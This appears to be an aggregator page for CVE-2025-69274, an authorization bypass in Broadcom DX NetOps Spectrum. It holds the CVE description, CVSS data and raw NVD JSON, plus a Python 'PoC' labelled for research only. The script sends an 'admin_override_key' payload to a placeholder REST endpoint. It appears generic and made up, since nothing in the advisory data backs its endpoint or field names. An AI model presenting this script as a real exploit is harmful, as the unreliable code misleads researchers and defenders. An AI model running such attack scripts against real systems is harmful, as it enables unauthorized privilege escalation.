Security Vulnerability Report
中文
CVE-2025-69274 CVSS 8.8 HIGH

CVE-2025-69274

Published: 2026-01-12 05:16:11
Last Modified: 2026-01-14 16:48:55

Description

Authorization Bypass Through User-Controlled Key vulnerability in Broadcom DX NetOps Spectrum on Windows, Linux allows Privilege Escalation.This issue affects DX NetOps Spectrum: 24.3.10 and earlier.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:broadcom:dx_netops_spectrum:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Broadcom DX NetOps Spectrum ≤ 24.3.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-69274 PoC - Authorization Bypass in Broadcom DX NetOps Spectrum # This PoC demonstrates the user-controlled key authorization bypass import requests import json TARGET_URL = "https://target-spectrum-host:8443" ATTACKER_SESSION = "attacker_session_cookie" TARGET_RESOURCE_ID = "spectrum_resource_12345" def exploit_authorization_bypass(): """ Exploit the authorization bypass vulnerability by manipulating user-controlled keys to gain unauthorized access to privileged resources. """ # Step 1: Identify the vulnerable endpoint that uses user-controlled key for authorization vulnerable_endpoint = f"{TARGET_URL}/spectrum/restful/resource/{TARGET_RESOURCE_ID}" # Step 2: Initial low-privilege request (will be denied) headers = { 'Cookie': f'SESSION={ATTACKER_SESSION}', 'Content-Type': 'application/json' } # Step 3: Inject malicious user-controlled key to bypass authorization # The vulnerability exists because the server trusts client-provided identifiers malicious_payload = { 'resource_id': TARGET_RESOURCE_ID, 'user_controlled_key': 'admin_override_key', # Malicious key injection 'action': 'ADMIN_ACCESS' } # Step 4: Send exploit request response = requests.post(vulnerable_endpoint, json=malicious_payload, headers=headers) if response.status_code == 200: print("[+] Authorization bypass successful!") print(f"[+] Gained elevated access to resource: {TARGET_RESOURCE_ID}") return True else: print("[-] Exploit failed - authorization check may have been fixed") return False if __name__ == "__main__": print("CVE-2025-69274 - Broadcom DX NetOps Spectrum Authorization Bypass") exploit_authorization_bypass()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69274", "sourceIdentifier": "[email protected]", "published": "2026-01-12T05:16:11.497", "lastModified": "2026-01-14T16:48:55.327", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authorization Bypass Through User-Controlled Key vulnerability in Broadcom DX NetOps Spectrum on Windows, Linux allows Privilege Escalation.This issue affects DX NetOps Spectrum: 24.3.10 and earlier."}, {"lang": "es", "value": "Elusión de autorización a través de vulnerabilidad de clave controlada por el usuario en Broadcom DX NetOps Spectrum en Windows, Linux permite escalada de privilegios. Este problema afecta a DX NetOps Spectrum: 24.3.10 y versiones anteriores."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:broadcom:dx_netops_spectrum:*:*:*:*:*:*:*:*", "versionEndExcluding": "24.3.11", "matchCriteriaId": "9AA7B1B9-33E1-4BFC-8991-05A12934E921"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36756", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}